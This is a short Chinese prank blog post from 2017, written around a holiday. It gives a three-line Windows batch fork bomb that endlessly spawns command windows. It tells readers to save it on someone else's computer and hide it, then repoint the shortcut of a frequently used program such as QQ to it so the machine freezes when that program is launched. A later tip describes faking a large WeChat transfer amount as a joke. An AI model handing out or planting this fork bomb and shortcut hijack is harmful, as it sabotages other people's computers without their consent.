单身狗求虐!这2个方法不要错过

2017-08-28 17:11应用 标签:浏览器 Chrome

本来今天的内容都快码完了,忽然看到某单身求虐。这就不对了,从来都只能我们欺负别人,不能别人欺负我们。如果觉得《敢动我的电脑?小编教你恶整来犯者》不够给力,那就来个更猛的如何?

QQ图片20170828142046

在别人的电脑上,用记事本中输入下面3行代码

:start

start cmd

goto start

将它保存为.bat格式,随便起个名字藏起来。

QQ图片20170828152851

然后找到他们常用的程序,像QQ一类开机就要登录或使用的软件,鼠标右键选择属性-快捷方式,将“目标”、“起始位置”修改成刚才做好的那个文件存放路径和名字,如

C:\Windows\nengsini.bat

只要他们运行这个“伪”快捷方式,肯定死机,一点办法都没有的说。哼哼哼,都教给大家了,你们看着办吧!

QQ图片20170828152955

哦,此外,又想借今天的日子用微信表白,又不想大出血的话,可以用小编开发出来的吝啬鬼专用方式进行哦(感觉更适合整人)。

先在微信随便转账个几毛几分钱,然后输入你想让人感觉惊讶的金额,如下图

QQ图片20170828153109

在对方没有点开微信看的时候,是这样的画面,一定会被惊到的说:

QQ图片20170828153200

但缺点就是,对方只有使用iPhone时才会有效,用Android手机会原形毕露的,所以大家还是酌情使用吧!